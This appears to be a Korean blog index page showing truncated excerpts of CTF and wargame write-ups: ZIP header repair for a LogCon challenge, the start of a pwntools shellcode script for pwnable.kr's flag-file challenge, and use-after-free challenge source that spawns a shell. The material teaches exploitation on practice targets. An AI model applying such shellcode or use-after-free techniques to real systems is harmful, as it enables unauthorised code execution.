hOwDayS 선린 10720
TeamLog에서 주최한 LogCon의 마지막문제인 JS 제국 문제 풀이...까맣게 잊고 있다가 선린고 신입생교육때 zip헤더 생각이 갑자기 나서개인적으로 문제 파일을 요청한다음 풀었다. 파일을 가져와서 zip으로 저장하자 헥스를 보면 zip헤더가 이상한 것을 볼 수 있다. 비교를 하기 위해 zip 안에있는 star.cpp 와 크기와 이름은 같은 파일을 생성한 후 압축하여 헤더를 비교를 해봤다 star.zip = 내가 만든파일 JDEMPIRE - 문제 파일 두헤더를 비교하면 빨간 색으로 된 부분은 공통적으로 있다는 것을 알 수 있다. = 그 이전에 헤더를 수정하면 zip을 복구 할 수 있다. Zip 특성상 위에 헤더와 밑의 헥스가 비슷 한 것을 볼 수 있는데예로 들어 star.zip의 헤더를 비교해보면 ..
solve.py 1234567891011121314from pwn import * context(arch='amd64',os='linux') #Setting shellcode='' #파일이름 저장shellcode+=shellcraft.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")shellcode+=shellcraft.ope..
uaf(user after free) 문제이다 A의 동적할당을 해제하고 다시 A를 다시 사용하였을때 똑같은 공간에 할당된다는 취약점을 이용한다. uaf.cpp 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980#include #include #include #include #include using namespace std; class Human{private: virtual void give_shell(){ system("/bin/sh"); }protected: int age; stri..